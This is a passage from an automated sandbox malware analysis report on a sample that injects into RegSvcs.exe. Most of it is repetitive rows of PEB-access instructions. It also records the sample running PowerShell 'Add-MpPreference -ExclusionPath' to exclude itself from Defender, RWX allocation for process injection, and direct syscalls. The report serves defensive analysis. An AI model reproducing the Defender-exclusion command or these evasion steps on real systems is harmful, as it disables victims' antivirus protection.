                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B438F mov eax, dword ptr fs:[00000030h]15_2_015B438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01596259 mov eax, dword ptr fs:[00000030h]15_2_01596259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158A250 mov eax, dword ptr fs:[00000030h]15_2_0158A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640274 mov eax, dword ptr fs:[00000030h]15_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640274 mov eax, dword ptr fs:[00000030h]15_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640274 mov eax, dword ptr fs:[00000030h]15_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640274 mov eax, dword ptr fs:[00000030h]15_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640274 mov eax, dword ptr fs:[00000030h]15_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640274 mov eax, dword ptr fs:[00000030h]15_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640274 mov eax, dword ptr fs:[00000030h]15_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640274 mov eax, dword ptr fs:[00000030h]15_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640274 mov eax, dword ptr fs:[00000030h]15_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640274 mov eax, dword ptr fs:[00000030h]15_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640274 mov eax, dword ptr fs:[00000030h]15_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01640274 mov eax, dword ptr fs:[00000030h]15_2_01640274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01618243 mov eax, dword ptr fs:[00000030h]15_2_01618243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01618243 mov ecx, dword ptr fs:[00000030h]15_2_01618243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158826B mov eax, dword ptr fs:[00000030h]15_2_0158826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01594260 mov eax, dword ptr fs:[00000030h]15_2_01594260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01594260 mov eax, dword ptr fs:[00000030h]15_2_01594260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01594260 mov eax, dword ptr fs:[00000030h]15_2_01594260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158823B mov eax, dword ptr fs:[00000030h]15_2_0158823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A2C3 mov eax, dword ptr fs:[00000030h]15_2_0159A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A2C3 mov eax, dword ptr fs:[00000030h]15_2_0159A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A2C3 mov eax, dword ptr fs:[00000030h]15_2_0159A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A2C3 mov eax, dword ptr fs:[00000030h]15_2_0159A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159A2C3 mov eax, dword ptr fs:[00000030h]15_2_0159A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A02E1 mov eax, dword ptr fs:[00000030h]15_2_015A02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A02E1 mov eax, dword ptr fs:[00000030h]15_2_015A02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A02E1 mov eax, dword ptr fs:[00000030h]15_2_015A02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016262A0 mov eax, dword ptr fs:[00000030h]15_2_016262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016262A0 mov ecx, dword ptr fs:[00000030h]15_2_016262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016262A0 mov eax, dword ptr fs:[00000030h]15_2_016262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016262A0 mov eax, dword ptr fs:[00000030h]15_2_016262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016262A0 mov eax, dword ptr fs:[00000030h]15_2_016262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016262A0 mov eax, dword ptr fs:[00000030h]15_2_016262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CE284 mov eax, dword ptr fs:[00000030h]15_2_015CE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CE284 mov eax, dword ptr fs:[00000030h]15_2_015CE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01610283 mov eax, dword ptr fs:[00000030h]15_2_01610283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01610283 mov eax, dword ptr fs:[00000030h]15_2_01610283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01610283 mov eax, dword ptr fs:[00000030h]15_2_01610283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A02A0 mov eax, dword ptr fs:[00000030h]15_2_015A02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A02A0 mov eax, dword ptr fs:[00000030h]15_2_015A02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01598550 mov eax, dword ptr fs:[00000030h]15_2_01598550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01598550 mov eax, dword ptr fs:[00000030h]15_2_01598550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C656A mov eax, dword ptr fs:[00000030h]15_2_015C656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C656A mov eax, dword ptr fs:[00000030h]15_2_015C656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C656A mov eax, dword ptr fs:[00000030h]15_2_015C656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01626500 mov eax, dword ptr fs:[00000030h]15_2_01626500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE53E mov eax, dword ptr fs:[00000030h]15_2_015BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE53E mov eax, dword ptr fs:[00000030h]15_2_015BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE53E mov eax, dword ptr fs:[00000030h]15_2_015BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE53E mov eax, dword ptr fs:[00000030h]15_2_015BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE53E mov eax, dword ptr fs:[00000030h]15_2_015BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01664500 mov eax, dword ptr fs:[00000030h]15_2_01664500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01664500 mov eax, dword ptr fs:[00000030h]15_2_01664500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01664500 mov eax, dword ptr fs:[00000030h]15_2_01664500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01664500 mov eax, dword ptr fs:[00000030h]15_2_01664500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01664500 mov eax, dword ptr fs:[00000030h]15_2_01664500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01664500 mov eax, dword ptr fs:[00000030h]15_2_01664500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01664500 mov eax, dword ptr fs:[00000030h]15_2_01664500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0535 mov eax, dword ptr fs:[00000030h]15_2_015A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0535 mov eax, dword ptr fs:[00000030h]15_2_015A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0535 mov eax, dword ptr fs:[00000030h]15_2_015A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0535 mov eax, dword ptr fs:[00000030h]15_2_015A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0535 mov eax, dword ptr fs:[00000030h]15_2_015A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A0535 mov eax, dword ptr fs:[00000030h]15_2_015A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015965D0 mov eax, dword ptr fs:[00000030h]15_2_015965D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CA5D0 mov eax, dword ptr fs:[00000030h]15_2_015CA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CA5D0 mov eax, dword ptr fs:[00000030h]15_2_015CA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CE5CF mov eax, dword ptr fs:[00000030h]15_2_015CE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CE5CF mov eax, dword ptr fs:[00000030h]15_2_015CE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CC5ED mov eax, dword ptr fs:[00000030h]15_2_015CC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CC5ED mov eax, dword ptr fs:[00000030h]15_2_015CC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015925E0 mov eax, dword ptr fs:[00000030h]15_2_015925E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE5E7 mov eax, dword ptr fs:[00000030h]15_2_015BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE5E7 mov eax, dword ptr fs:[00000030h]15_2_015BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE5E7 mov eax, dword ptr fs:[00000030h]15_2_015BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE5E7 mov eax, dword ptr fs:[00000030h]15_2_015BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE5E7 mov eax, dword ptr fs:[00000030h]15_2_015BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE5E7 mov eax, dword ptr fs:[00000030h]15_2_015BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE5E7 mov eax, dword ptr fs:[00000030h]15_2_015BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BE5E7 mov eax, dword ptr fs:[00000030h]15_2_015BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CE59C mov eax, dword ptr fs:[00000030h]15_2_015CE59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016105A7 mov eax, dword ptr fs:[00000030h]15_2_016105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016105A7 mov eax, dword ptr fs:[00000030h]15_2_016105A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Code functions (process 15) that execute mov <reg>, dword ptr fs:[00000030h], i.e. load the PEB pointer from the TEB of this 32-bit process. One row per function; the destination register of each such read is listed in the report's order (×n = n consecutive reads into that register):
15_2_016105A7  eax
15_2_015C4588  eax
15_2_01592582  eax, ecx
15_2_015B45B1  eax ×2
15_2_015B245A  eax
15_2_0161C460  ecx
15_2_0158645D  eax
15_2_015CE443  eax ×8
15_2_015BA470  eax ×3
15_2_01616420  eax ×7
15_2_015C8402  eax ×3
15_2_015CA430  eax
15_2_0158E420  eax ×3
15_2_0158C427  eax
15_2_015904E5  ecx
15_2_0161A4B0  eax
15_2_015C44B0  ecx
15_2_015964AB  eax
15_2_01590750  eax
15_2_015D2750  eax ×2
15_2_015C674D  esi, eax ×2
15_2_01598770  eax
15_2_015A0770  eax ×12
15_2_01614755  eax
15_2_0161E75D  eax
15_2_01590710  eax
15_2_015C0710  eax
15_2_0160C730  eax
15_2_015CC700  eax
15_2_015C273C  eax, ecx, eax
15_2_015CC720  eax ×2
15_2_0161E7E1  eax
15_2_0159C7C0  eax
15_2_016107C3  eax
15_2_015947FB  eax ×2
15_2_015B27ED  eax ×3
15_2_016447A0  eax
15_2_0163678E  eax
15_2_015907AF  eax
15_2_0165866E  eax ×2
15_2_015AC640  eax
15_2_015C2674  eax
15_2_015CA660  eax ×2
15_2_015D2619  eax
15_2_015A260B  eax ×7
15_2_0160E609  eax
15_2_0159262C  eax
15_2_015C6620  eax
15_2_015C8620  eax
15_2_015AE627  eax
15_2_016106F1  eax ×2
15_2_0160E6F2  eax ×4
15_2_015CA6C7  ebx, eax
15_2_01594690  eax ×2
15_2_015C66B0  eax
15_2_015CC6A6  eax
15_2_01634978  eax ×2
15_2_0161C97C  eax
15_2_01610946  eax
15_2_015D096E  eax, edx, eax
15_2_015B6962  eax ×3
15_2_01588918  eax ×2
15_2_0162892B  eax
15_2_0161892A  eax
15_2_0160E908  eax ×2
15_2_0161C912  eax
15_2_0161E9E0  eax
15_2_0159A9D0  eax ×6
15_2_015C49D0  eax
15_2_016269C0  eax
15_2_015C29F9  eax ×2
15_2_0165A9D3  eax
15_2_016189B3  esi, eax ×2
15_2_015909AD  eax ×2
15_2_015A29A0  eax ×13
15_2_01594859  eax ×2
15_2_015C0854  eax
15_2_01626870  eax ×2
15_2_0161E872  eax ×2
15_2_015A2840  ecx
15_2_0163483A  eax ×2
15_2_015CA830  eax
15_2_015B2835  eax ×3, ecx, eax ×2
15_2_0161C810  eax
15_2_0165A8E4  eax
15_2_015BE8C0  eax
15_2_015CC8F9  eax ×2
15_2_01590887  eax
15_2_0161C89D  eax
15_2_01638B42  eax
15_2_01626B40  eax ×2
15_2_0165AB40  eax
15_2_0158CB7E  eax
15_2_01644B4B  eax ×2
15_2_0163EB50  eax
15_2_01658B28  eax ×2
15_2_015BEB20  eax ×2
15_2_0160EB1D  eax ×9
15_2_015B0BCB  eax ×3
15_2_0161CBF0  eax
15_2_01590BCD  eax ×3
15_2_015BEBFC  eax
15_2_01598BF0  eax ×3
15_2_0163EBD0  eax
15_2_01644BB0  eax ×2
15_2_015A0BBE  eax ×2
15_2_015A0A5B  eax ×2
15_2_0163EA60  eax
15_2_01596A50  eax ×7
15_2_0160CA72  eax
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160CA72 mov eax, dword ptr fs:[00000030h]15_2_0160CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CCA6F mov eax, dword ptr fs:[00000030h]15_2_015CCA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CCA6F mov eax, dword ptr fs:[00000030h]15_2_015CCA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CCA6F mov eax, dword ptr fs:[00000030h]15_2_015CCA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CCA38 mov eax, dword ptr fs:[00000030h]15_2_015CCA38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B4A35 mov eax, dword ptr fs:[00000030h]15_2_015B4A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015B4A35 mov eax, dword ptr fs:[00000030h]15_2_015B4A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161CA11 mov eax, dword ptr fs:[00000030h]15_2_0161CA11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BEA2E mov eax, dword ptr fs:[00000030h]15_2_015BEA2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CCA24 mov eax, dword ptr fs:[00000030h]15_2_015CCA24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01590AD0 mov eax, dword ptr fs:[00000030h]15_2_01590AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C4AD0 mov eax, dword ptr fs:[00000030h]15_2_015C4AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C4AD0 mov eax, dword ptr fs:[00000030h]15_2_015C4AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015E6ACC mov eax, dword ptr fs:[00000030h]15_2_015E6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015E6ACC mov eax, dword ptr fs:[00000030h]15_2_015E6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015E6ACC mov eax, dword ptr fs:[00000030h]15_2_015E6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CAAEE mov eax, dword ptr fs:[00000030h]15_2_015CAAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015CAAEE mov eax, dword ptr fs:[00000030h]15_2_015CAAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C8A90 mov edx, dword ptr fs:[00000030h]15_2_015C8A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159EA80 mov eax, dword ptr fs:[00000030h]15_2_0159EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159EA80 mov eax, dword ptr fs:[00000030h]15_2_0159EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159EA80 mov eax, dword ptr fs:[00000030h]15_2_0159EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159EA80 mov eax, dword ptr fs:[00000030h]15_2_0159EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159EA80 mov eax, dword ptr fs:[00000030h]15_2_0159EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159EA80 mov eax, dword ptr fs:[00000030h]15_2_0159EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159EA80 mov eax, dword ptr fs:[00000030h]15_2_0159EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159EA80 mov eax, dword ptr fs:[00000030h]15_2_0159EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159EA80 mov eax, dword ptr fs:[00000030h]15_2_0159EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01664A80 mov eax, dword ptr fs:[00000030h]15_2_01664A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01598AA0 mov eax, dword ptr fs:[00000030h]15_2_01598AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01598AA0 mov eax, dword ptr fs:[00000030h]15_2_01598AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015E6AA4 mov eax, dword ptr fs:[00000030h]15_2_015E6AA4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01590D59 mov eax, dword ptr fs:[00000030h]15_2_01590D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01590D59 mov eax, dword ptr fs:[00000030h]15_2_01590D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01590D59 mov eax, dword ptr fs:[00000030h]15_2_01590D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01598D59 mov eax, dword ptr fs:[00000030h]15_2_01598D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01598D59 mov eax, dword ptr fs:[00000030h]15_2_01598D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01598D59 mov eax, dword ptr fs:[00000030h]15_2_01598D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01598D59 mov eax, dword ptr fs:[00000030h]15_2_01598D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01598D59 mov eax, dword ptr fs:[00000030h]15_2_01598D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01628D6B mov eax, dword ptr fs:[00000030h]15_2_01628D6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C4D1D mov eax, dword ptr fs:[00000030h]15_2_015C4D1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01618D20 mov eax, dword ptr fs:[00000030h]15_2_01618D20
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\n2pGr8w21V.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe"
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uEugNEto.exe"
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtWriteVirtualMemory: Direct from: 0x77762E3C
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtMapViewOfSection: Direct from: 0x77762D1C
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtNotifyChangeKey: Direct from: 0x77763C2C
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtCreateMutant: Direct from: 0x777635CC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtResumeThread: Direct from: 0x777636AC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtProtectVirtualMemory: Direct from: 0x77757B2E
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtQuerySystemInformation: Direct from: 0x77762DFC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtAllocateVirtualMemory: Direct from: 0x77762BFC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtReadFile: Direct from: 0x77762ADC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtDelayExecution: Direct from: 0x77762DDC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtWriteVirtualMemory: Direct from: 0x7776490C
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtQueryInformationProcess: Direct from: 0x77762C26
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtResumeThread: Direct from: 0x77762FBC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtCreateUserProcess: Direct from: 0x7776371C
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtAllocateVirtualMemory: Direct from: 0x77763C9C
